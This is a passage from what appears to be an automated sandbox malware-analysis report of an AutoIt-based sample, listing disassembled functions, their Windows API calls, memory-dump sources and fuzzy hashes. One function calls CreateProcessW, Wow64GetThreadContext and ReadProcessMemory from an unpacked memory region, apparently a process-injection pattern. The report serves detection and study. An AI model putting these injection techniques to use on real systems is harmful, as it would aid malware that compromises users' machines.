CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00B79548,?,?,?,?,?,00000004), ref: 00B798BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00B79548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00B798D1
CloseHandle.KERNEL32(00000000,?,00B79548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B798D8

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: e18f22149f36d7b3ad1d5eb89acceec822bfaf95b43571400b2ae1724d5e73ef
Instruction ID: ab6d9c6930e590bd19652baa62b6d0a8c3ddb72a93e8608211794d8617420638
Opcode Fuzzy Hash: e18f22149f36d7b3ad1d5eb89acceec822bfaf95b43571400b2ae1724d5e73ef
Instruction Fuzzy Hash: C3E08632140225B7D7211B64ED09FDA7B59EB06B70F208121FB24BA0E08BB1191197D8

Function 00B78D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B78D1B

Part of subcall function 00B32D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00B39A24), ref: 00B32D69
Part of subcall function 00B32D55: GetLastError.KERNEL32(00000000,?,00B39A24), ref: 00B32D7B

_free.LIBCMT ref: 00B78D2C
_free.LIBCMT ref: 00B78D3E

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: 14f65778ae8c1e14c86069af5b4106fa61624bfaecea595873bcfc44f5fa0ff2
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: 69E012B164160156CB34A678AD48A9323DC8F58352B3449BDB41DD7186DF64F8428124

Function 00B1A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00B4FC01

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: b40b055a65afa42a0ccdf635fd7fc8392cbf2f8295c6726a2bece49426520e12
Instruction ID: 4ccda347002d904dd24d35ab8e4de1b265aaf095a9e1855509302f7da4a57702
Opcode Fuzzy Hash: b40b055a65afa42a0ccdf635fd7fc8392cbf2f8295c6726a2bece49426520e12
Instruction Fuzzy Hash: 79225970509341DFCB24DF14C494AAABBE1FF89304F5489ADE89A9B361D731ED85CB82

Function 00B14C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B14CBA

Strings

EA06, xrefs: 00B4D8CC

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: bcb265ff977d191299b9dc8cd4839531725a67d80c394dc90d0316d82c5cdce8
Instruction ID: 26f2c431c5c695f8ac000e5ee8da863211651d2094af9494233f7b27100cca33
Opcode Fuzzy Hash: bcb265ff977d191299b9dc8cd4839531725a67d80c394dc90d0316d82c5cdce8
Instruction Fuzzy Hash: 37414D72A0415867DF219B64E8917FE7FE2DB45300FE844F5EC869B286D7209DC483A2

Function 00B777B3 Relevance: 3.1, APIs: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B778DB

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 33ee2adab76b61eaad11b048421302318a8f1e1106a9e19eb2b4e9a6ccc829cf
Instruction ID: 700506814284a624637f338fe96ecaa20c7c1a2bfcf019a43fb2813eab935330
Opcode Fuzzy Hash: 33ee2adab76b61eaad11b048421302318a8f1e1106a9e19eb2b4e9a6ccc829cf
Instruction Fuzzy Hash: E74107719482059FCB10EFA9D8C59BAB7E8FF09300F2484E9E59997382DF759C01C761

Function 00B17A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B17AAB
_memmove.LIBCMT ref: 00B17B16

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
Instruction ID: 6ddb5d13fae98069424df3661b2f65be8d8680bf5f7a526efea4bba47c0cb397
Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
Instruction Fuzzy Hash: D23184B1654606AFC704DF68C8D1DA9B3F9FF48310B6586A9E919CB291EF30E950CB90

Function 00B147D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00B14834

Part of subcall function 00B3336C: __lock.LIBCMT ref: 00B33372
Part of subcall function 00B3336C: DecodePointer.KERNEL32(00000001,?,00B14849,00B67C74), ref: 00B3337E
Part of subcall function 00B3336C: EncodePointer.KERNEL32(?,?,00B14849,00B67C74), ref: 00B33389

Part of subcall function 00B148FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B14915
Part of subcall function 00B148FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B1492A

Part of subcall function 00B13B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B13B68
Part of subcall function 00B13B3A: IsDebuggerPresent.KERNEL32 ref: 00B13B7A
Part of subcall function 00B13B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00BD52F8,00BD52E0,?,?), ref: 00B13BEB
Part of subcall function 00B13B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00B13C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B14874

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 674aa33d492d4c28ea9fd637a690cd7b07b3c36c1c4bfe271ed390ffd0baab69
Instruction ID: fd23fad447b4c57fb309cd08e4f2330ab882d02106d68096dc590aa29898616c
Opcode Fuzzy Hash: 674aa33d492d4c28ea9fd637a690cd7b07b3c36c1c4bfe271ed390ffd0baab69
Instruction Fuzzy Hash: 8F119D719093419BC710DF68D85595AFBE8EF89750F50455FF050832B1EF709A89CF92

Function 00B15C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00B15821,?,?,?,?), ref: 00B15CC7
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00B15821,?,?,?,?), ref: 00B4DD73

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f70dc6fe0cdd4c7a05aba5ea991311600804a488f60d9e1a15bd14d9aff705ee
Instruction ID: 7b9afb808cba63dfd8f32eb0ed160c8312b48e7181f23c311d71760b53523c05
Opcode Fuzzy Hash: f70dc6fe0cdd4c7a05aba5ea991311600804a488f60d9e1a15bd14d9aff705ee
Instruction Fuzzy Hash: 8D018470144748FEF3300E24CD8AFB636DCEB01768F608355BAE5AA1E0C6B41C848B94

Function 00B30DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B3571C: __FF_MSGBANNER.LIBCMT ref: 00B35733
Part of subcall function 00B3571C: __NMSG_WRITE.LIBCMT ref: 00B3573A
Part of subcall function 00B3571C: RtlAllocateHeap.NTDLL(016F0000,00000000,00000001,00000000,?,?,?,00B30DD3,?), ref: 00B3575F

std::exception::exception.LIBCMT ref: 00B30DEC
__CxxThrowException@8.LIBCMT ref: 00B30E01

Part of subcall function 00B3859B: RaiseException.KERNEL32(?,?,?,00BC9E78,00000000,?,?,?,?,00B30E06,?,00BC9E78,?,00000001), ref: 00B385F0

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 0d050d738133e46b7bc753442051ee8286a5abd5eae963809a8ade978d1ac1e6
Instruction ID: 69ac703e5eccfd738a3606f95f64f6557a553566efc3cbe85bace5641d5b6cd7
Opcode Fuzzy Hash: 0d050d738133e46b7bc753442051ee8286a5abd5eae963809a8ade978d1ac1e6
Instruction Fuzzy Hash: 2CF0A43290431A66DB10BF98EC56ADF77ECDF05311F2044F9FD04A6A92DF719A4482D1

Function 00B355FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B3562C
__lock_file.LIBCMT ref: 00B3564D

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: f589465c8125c3a4864e40714eb18aa65fda5607a10f3467d5e1f411c7c5601d
Instruction ID: 833983adbbbe5e94ddac44fd0baecb46c136df3c8783314d9e7aaa9f96a0d873
Opcode Fuzzy Hash: f589465c8125c3a4864e40714eb18aa65fda5607a10f3467d5e1f411c7c5601d
Instruction Fuzzy Hash: BB01A7B1801609EBCF22AF689C0799E7BE1EF51361F7442D5F8141B1A1DB318A51DF92

Function 00B353A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B38B28: __getptd_noexit.LIBCMT ref: 00B38B28

__lock_file.LIBCMT ref: 00B353EB

Part of subcall function 00B36C11: __lock.LIBCMT ref: 00B36C34

__fclose_nolock.LIBCMT ref: 00B353F6

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 13249e1ba664a5e48e879fc61982eb9746820c6d3b2f39f86fedb87ee09df7f5
Instruction ID: 06c36be35034c85544e0ca4c14b8f816fd8317cdb46ffcd8d3c7e2bd1a08e31e
Opcode Fuzzy Hash: 13249e1ba664a5e48e879fc61982eb9746820c6d3b2f39f86fedb87ee09df7f5
Instruction Fuzzy Hash: B5F0B471801B049ADB31BF7598067AD7BE0AF41374F3182C8B425AB1C1CFFC89459B96

Function 0410129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 04101A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04101AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04101B13

Memory Dump Source

Source File: 00000000.00000002.1376585678.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_AuKUol8SPU.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: aa5ac5a3be62539e190cb66ef3a7ce968b32dbbeab3f01f3ced4961a16edbae6
Instruction ID: fa8b041cb1cfc3eba66cdbf6bf23ed4e8b9327c142d1cf7dedcc1081a6a6df66
Opcode Fuzzy Hash: aa5ac5a3be62539e190cb66ef3a7ce968b32dbbeab3f01f3ced4961a16edbae6
Instruction Fuzzy Hash: 6E12DF24E24658C6EB24DF60D8507DEB232EF68300F1091E9910DEB7A5E77A5F81CF5A

Function 00B21FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c8602809246ca238071055bd24f02c95b28d022e0c52f0414fd949d5a165536
Instruction ID: 1393276b52a87f19a20d937c93b27cf23b3bcfe7567811e5b1c4091732b5cdab
Opcode Fuzzy Hash: 7c8602809246ca238071055bd24f02c95b28d022e0c52f0414fd949d5a165536
Instruction Fuzzy Hash: 72515035600614EBCF14EF64D991FAE77E6AF85310F5481E8F80A9B392DA30ED45CB51

Function 00B15AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00B15B96

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3468e7f12582f3e1469a78a819d5fda6fc18f193f33eeefde84e085309741a72
Instruction ID: 4ecd1a421151994fcfa6f8be9b34342cd23a87fbcefac4fc5cd3444095053877
Opcode Fuzzy Hash: 3468e7f12582f3e1469a78a819d5fda6fc18f193f33eeefde84e085309741a72
Instruction Fuzzy Hash: 24313C31A04A15EFCB28DF6CC480AAEB7F5FF88310F5486A9D81593750D770B990CB91

Function 00B4FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00B4FCB7

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 9e5ee1120aadbc9ab23ce3b50cf8c8aac316b678c0941ab2c5fb5b5a8cf0ca1c
Instruction ID: 72e55f984cf52c5220ea3a1d516e4fefc798b9ccc1916396f644c61fffc21274
Opcode Fuzzy Hash: 9e5ee1120aadbc9ab23ce3b50cf8c8aac316b678c0941ab2c5fb5b5a8cf0ca1c
Instruction Fuzzy Hash: 09410774A043519FDB14DF14C494B5ABBE1FF49318F5988ACE8998B362C732E885CF52

Function 00B17B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B17BB3

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: f249ec885d1636ebb2f5c9a8fa1af762ac25980a29bb3110c56e14f1db2dec9b
Instruction ID: 7a5f6d72ed7e4ab1cdd975ff55e30fbf865258ec2a89e4ff69a72a570eab1109
Opcode Fuzzy Hash: f249ec885d1636ebb2f5c9a8fa1af762ac25980a29bb3110c56e14f1db2dec9b
Instruction Fuzzy Hash: B6212472A08A09EBDB148F15E891AAA7BF4FF18351F2084E9E856C6191EF30D2D0E745

Function 00B14DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B14BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00B14BEF

Part of subcall function 00B3525B: __wfsopen.LIBCMT ref: 00B35266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00BD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B14E0F

Part of subcall function 00B14B6A: FreeLibrary.KERNEL32(00000000), ref: 00B14BA4

Part of subcall function 00B14C70: _memmove.LIBCMT ref: 00B14CBA

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: f357c012d4b8b048f5684f730c45487cc7f6caae15316de9879df5cdaa813b74
Instruction ID: ffbe92bf405cbcfe23acafd800b28fd97591c434b2343b89c051705fd39f0007
Opcode Fuzzy Hash: f357c012d4b8b048f5684f730c45487cc7f6caae15316de9879df5cdaa813b74
Instruction Fuzzy Hash: 1E11E332600206ABCF14AF70CC12FEE77E9AF44710F5088ADF541E7181DB719A419B50

Function 00B4FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00B4FD91

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 1dd6c8b1a9e1011c32e50973e72fe097648771bea4c1a988f3423f71c0de39b1
Instruction ID: fa264488a9ae71ec35fab36456c1e233b24d37d5ee0255328b0520971d877a90
Opcode Fuzzy Hash: 1dd6c8b1a9e1011c32e50973e72fe097648771bea4c1a988f3423f71c0de39b1
Instruction Fuzzy Hash: 78211574A18351DFCB14EF24C454B5ABBE1BF88314F4589ACE88A57722D731F845CB92

Function 00B15BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00B156A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00B15C16

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 82f1e9d0554abafa536e8a70c5405e0ae66247bf15ed7c72b8b4806739251d7d
